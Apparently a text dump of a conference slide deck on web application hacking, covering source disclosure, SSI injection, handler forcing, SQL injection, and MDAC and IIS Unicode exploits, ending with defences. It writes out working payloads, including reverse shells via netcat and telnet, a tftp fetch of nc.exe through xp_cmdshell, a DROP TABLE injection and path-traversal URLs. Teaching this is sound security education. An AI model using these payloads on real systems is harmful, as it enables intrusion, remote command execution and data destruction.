Westfield Holdings Limited

Westfield Holdings Limited

Web Hacking Saumil Shah JD Glaser Foundstone Inc. Recipe for an E-Commerce roll-out Basic Ingredients: (serves 1 mid-range network) Web Server Application Server Database Server and a Firewall (for extra spicy flavour)

Recipe for an E-Commerce roll-out Dressing / Sauces: (optional, but improves flavour) Load Balancer Reverse Proxy servers Cache systems Recipe for an E-Commerce roll-out HTTP request (cleartext or SSL) Web Client

SQL Database Firewall Web app Web Server Web app Web app Web app HTTP reply

(HTML, Javascript, VBscript, etc) Apache IIS Netscape etc Plugins: Perl C/C++ JSP, etc DB

DB Database connection: ADO, ODBC, etc. Traditional Hacking Targeted against vulnerabilities in OS components and Network services. Attacks specific to operating system architecture, authentication, services, etc. Myriad of exploits for different services, OS platforms, CPU architectures, etc. Traditional Hacking

Requires rocket science such as coding shell-code for buffer-overflows, etc. In short, it is a complex activity. ... winsock_found: xor push inc push inc push call

cmp jnz push push call jmp socket_ok: mov mov mov ... eax, eax eax eax eax

eax eax socket eax, -1 socket_ok sockerrl offset sockerr write_console quit2 sock, eax sin.sin_family, 2 esi, offset _port Traditional HackingLimitations Modern network architectures are getting more robust and secure.

Firewalls being used in almost all network roll-outs. OS vendors learning from past mistakes (?) and coming out with patches rapidly. Increased maturity in coding practices. Traditional HackingLimitations Hacks on OS network services prevented by firewalls. Web app Web Server

wu-ftpd X Sun RPC X NT ipc$ X Web app Web app Web app DB DB

Traditional HackingLimitations Internal back-end application servers are on a nonroutable IP network. (private addresses) Web app Web Server Web app Web app Web app

X DB DB The Next Generation of Hacking E-commerce / Web hacking is unfettered. Web traffic is the most commonly allowed of protocols through Internet firewalls. Why fight the wall when youve got an open door? HTTP is perceived as friendly traffic. Content/Application based attacks are still perceived as rare. The Web Hackers Toolbox

Essentially, all a web hacker needs is a web browser, an Internet connection, and a clear mind. Types of Web Hacks Web app Web Client Web Server Web app

Web app Web app URL Interpretation Attacks. web server misconfiguration DB DB Types of Web Hacks Web app Web

Client Web Server Web app Web app Web app Input Validation attacks. URL Interpretation attacks poor

checking of user inputs DB DB Types of Web Hacks Web app Web Client Web Server

Web app Web app Web app DB DB SQL Query Poisoning URL Interpretation attacks Input Validation

attacks Extend SQL statements Types of Web Hacks Reverseengineering HTTP cookies. Web app Web Client Web Server

Web app Web app Web app HTTP session hijacking. Impersonation. URL Interpretation attacks Input Validation attacks

DB DB SQL query poisoning The Web Hackers Toolbox Some desired accessories would be a port scanner, netcat,

vulnerability checker (e.g. whisker), OpenSSL, etc. Basic Web Kung-fu Moves Web Port Scanning: Look for well-known TCP web ports. 80, 81, 443, 8000, 8080, etc FScan (from Foundstone) fscan -p 80,81,443,8000,8080 10.0.0.1 nmap (by Fyodor) nmap -p 80,81,443,8000,8080 10.0.0.1 Basic Web Kung-fu Moves Web Server Fingerprinting:

HTTP Banner grabbing. netcat as a TCP client (even telnet works) nc 10.0.0.1 80 HEAD / HTTP/1.0 Advanced HTTP directives: TRACE, OPTIONS, etc. Basic Web Kung-fu Moves Checking for Low Hanging Fruits: Known web vulnerabilities. Whisker (by Rain Forest Puppy) ./whisker.pl -h 10.0.0.1 -I 1 cgichk.c Retina, etc.

Some Advanced Web Kung-fu Moves Hacking over SSL: OpenSSL: openssl s_client -connect 10.0.0.1:443 HEAD / HTTP/1.0 SSLProxy. Hacking over SSL Some SSL Myths:

We are secure because we use SSL! Strong 128 bit crypto being used We use Digital Certificates signed by VeriSign Hacking over SSL Using netcat and OpenSSL, it is possible to create a simple two-line SSL Proxy! Listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL. web client nc

openssl SSL web server Our Targets 10.0.0.1 NT: WebLogic, IIS, Java Web Server. 10.0.0.2

Linux: Apache, ServletExec. 10.0.0.3 NT: IIS, SQL Server. Use the Source, Luke WebLogic / WebSphere JSP bug. Discovered by Shreeraj Shah, Foundstone. Ability to retrieve source code of JSP/JHTML files.

Classic example of web server misconfiguration. Using uppercase JSP in the URL causes the server to return unparsed JSP code. Source Code Disclosure WebLogic / WebSphere JSP bug example: How it works HTTP Request: index.JSP WebLogic Server html

handler shtml handler weblogic.httpd.register.file= weblogic.servlet.FileServlet weblogic.httpd.register.*.shtml= weblogic.servlet.ServerSideIncludeServlet weblogic.httpd.register.*.jhtml= weblogic.servlet.jhtmlc.PageCompileServlet weblogic.httpd.register.*.jsp= weblogic.servlet.JSPServlet index.JSP = index.jsp jhtml

handler jsp handler default handler X Process JSP tags Java Compiler Java Runtime index.jsp

More Source Code Disclosure URL prefixes for source code disclosure: /servlet/file/ (IBM WebSphere) /file/ (BEA WebLogic) /*.shtml/ (BEA WebLogic) /ConsoleHelp/

(BEA WebLogic) /servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer) Advisories on Foundstones advisories page: http://www.foundstone.com/advisories.htm Another example IIS +.htr bug. View source code of ASP/ASA files. URL interpretation vulnerability. http://10.0.0.1/global.asa+.htr .htr causes ISM.DLL to handle the URL. Characters after the + sign (space) are ignored.

Other Source Code Disclosures Some applications access files without appropriate checking. Input validation vulnerability. No checking performed for file type or location. Filenames can be manipulated via parameters passed on the URL or as hidden fields. Example: showcode.asp or codebrws.asp IIS showcode.asp Bundled with IIS samples in NT Option Pack 4.0. Allows an attacker to view arbitrary files using the following URL:

http://10.0.0.1/msadc/showcode.asp? source=/msadc/../../../../../path/to/ file.name IIS showcode.asp showcode.asp example: Input Validation and SSI SSI (Server Side Includes) tags allow commands to be executed locally on the system via #exec tags. Some applications save user inputs on a local file. Malicious SSI tags can be uploaded via such applications. The result: Remote Command Execution!

SSI - guestbook.pl guestbook.pl One of the many free CGI scripts available. Vulnerable on servers that parse .html files through SSI. SSI - guestbook.pl guestbook.pl Insert SSI tags as guestbook comments.

cat /etc/passwd; xterm & SSI - guestbook.pl web server mod_ssi Guestbook comment contains SSI tag which is saved in guestbook.html on the server. addguest .html

guestbook.pl guestbook .html

.html files are registered to be parsed by mod_ssi, causing the SSI tags to be parsed and the command executed. addguest .html guestbook.pl guestbook .html passwd

/usr/X11/bin/xterm -display 10.1.1.14:0.0 Web Server Architecture Attacks Sometimes the way web servers are implemented can lead to vulnerabilities. A common attack is to bypass the web server configuration directives, and invoke built-in procedures directly. A close look at the web server architecture can reveal holes. Web Server Architecture Attacks html handler

text/html header text/html header shtml handler Web Server cgi handler html

shtml include file Process SSI tags #include #exec text/html sh, header perl, /bin/sh cgi

Process Java JSP tags Compiler jsp handler jsp Java Runtime default handler ??

class script/ execu-table Web Server Architecture Attacks Handler Forcing: Certain mis-configurations allow for handlers to be forced onto files that are not supposed to be processed by them. Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned as-is. Web Server Architecture Attacks

Handler Forcing: Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time! Handler Forcing Sun Java Web Server: Direct servlet invocation by the /servlet/ prefix. Can force the PageCompile handler (servlet) on any file in the web document directory. Files get compiled and executed as JSPs! Discovered by Shreeraj Shah, Foundstone. Handler Forcing

Sun Java Web Server: Exploit: http://10.0.0.2/servlet/ com.sun.server .http.pagecompile.jsp.runtime. JspServlet/path/to/file.html Handler Forcing html handler text/html header html

JSP PageCompile handler forced on to html files Web Server jsp handler Process JSP tags Java Compiler

Java Runtime class Handler Forcing Sun Java Web Server: Bulletin Board example. User comments stored in board.html. Users can upload arbitrary JSP code in board.html. Forcing handlers causes compilation and execution of arbitrary code. Can lead to root level compromise. Handler Forcing On NT:

JSP code for invoking cmd.exe: <%String s=null,t="";try{Process p=Runtime.getRuntime().exec(cmd /c dir c: / w");BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));while ((s=sI.readLine())!=null) {t+=s;}}catch(IOException e) {e.printStackTrace();}%> <%=t %> Handler Forcing On Unix (if xterm is not present): JSP code for Reverse Telnet: <%String s=null,t="";try{Process p=Runtime.getRuntime().exec(/bin/sh telnet

10.0.0.11 2000 | /bin/sh | telnet 10.0.0.11 2001");BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));while ((s=sI.readLine())!=null) {t+=s;}}catch(IOException e) {e.printStackTrace();}%> <%=t %> SQL Query Poisoning Poor input validation on parameters passed to SQL queries can be disastrous. For example: Dim sql_con, result, sql_qry Const CONNECT_STRING = "Provider=SQLOLEDB;SERVER=WEB_DB;UID=sa;

PWD=xyzzy" sql_qry = "SELECT * FROM PRODUCT WHERE ID = & Request.QueryString(ID) Set objCon = Server.CreateObject("ADODB.Connection") objCon.Open CONNECT_STRING Set objRS = objCon.Execute(strSQL) SQL Query Poisoning Return all rows: http://10.0.0.3/showtable.asp? ID=3+OR+1=1 Resultant query: SELECT * FROM PRODUCT WHERE ID = 3 OR 1 = 1

SQL Query Poisoning Drop Table: http://10.0.0.3/showtable.asp? ID=3%01DROP+TABLE+PRODUCT Resultant query: SELECT * FROM PRODUCT WHERE ID = 3 DROP TABLE PRODUCT SQL Query Poisoning Remote Command Execution! http://10.0.0.3/showtable.asp? ID=3%01EXEC+master..xp_cmdshell+ tftp+-i+10.0.0.13+GET+nc.exe+ %26%26+nc+-e+cmd.exe+10.0.0.11+2000

Command executed: tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000 SQL Query Poisoning How it works 1 Web Browser C:\>_ listener at port 2001 to receive the connection

ASP DB IIS 4.0 SELECT * FROM PRODUCT WHERE ID=3 EXEC master..xp_cmdshell tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000 3 2 nc.exe

tftp server tftp server to get nc.exe transferred over to the NT IIS box. The MDAC Hack Vulnerability with Microsoft Data Access Components (msadcs.dll). Discovered by Rain Forest Puppy. MDAC allows remote users to perform SQL queries without authentication. Only the DSN needs to be known. SQL queries can be crafted to execute

arbitrary commands. The MDAC Hack Exploit: $query="Select * from Customers where City='|shell(\"$command\")|'"; $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" . $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";} Gain Administrator Privileges on NT! The MDAC Hack How it works msadcs dll

1 mdac.pl (exploit) C:\>_ listener at port 2001 to receive the connection DB IIS 4.0 SELECT * FROM Customers WHERE

City = |shell($command) 3 2 nc.exe tftp server tftp server to get nc.exe transferred over to the NT IIS box. And last but not the least

The IIS Unicode bug. URL Parsing vulnerability. Improper handling of illegal Unicode sequences. Allows remote users to execute arbitrary commands on the web server under the context of IUSR. Can lead to potential Administrator level access. The IIS Unicode bug Exploit: http://10.0.0.1/scripts/..%c0%af../ winnt/system32/cmd.exe?/c+dir %c0%af = /

Can use HTTP POST to send multiple commands at a time to cmd.exe. Surprise Demonstration One-way hacking. All activity performed through LEGAL HTTP requests. No outbound connections, no tftp, no listeners. Administrator compromise of NT. Root Causes of Web Hacks Complex web architectures may cause oversight in web server configuration. URL Parsing. File Canonicalization.

Combination of underlying operating system and web server may leave holes. Root Causes of Web Hacks Untested code used in web applications, to save time. Level of security consciousness low in web application developers. Security vs. convenience. Security vs. time-to-market. Zero knowledge administration breeds zero knowledge administrators. Web Security Measures Heighten security awareness amongst administrators, developers and most

important - TOP MANAGEMENT! Firewalls and SSL do not solve all security problems. Keep abreast of latest vendor advisories and patches. Monitor security mailing lists such as BugTraq. Web Security Measures Follow secure coding practices. Perform extensive code reviews and application testing, especially for input validation. Follow the principle of least privilege. Read Security Issues in CNET Builder.com!

Thank You! Saumil Shah JD Glaser [email protected] [email protected]

Recently Viewed Presentations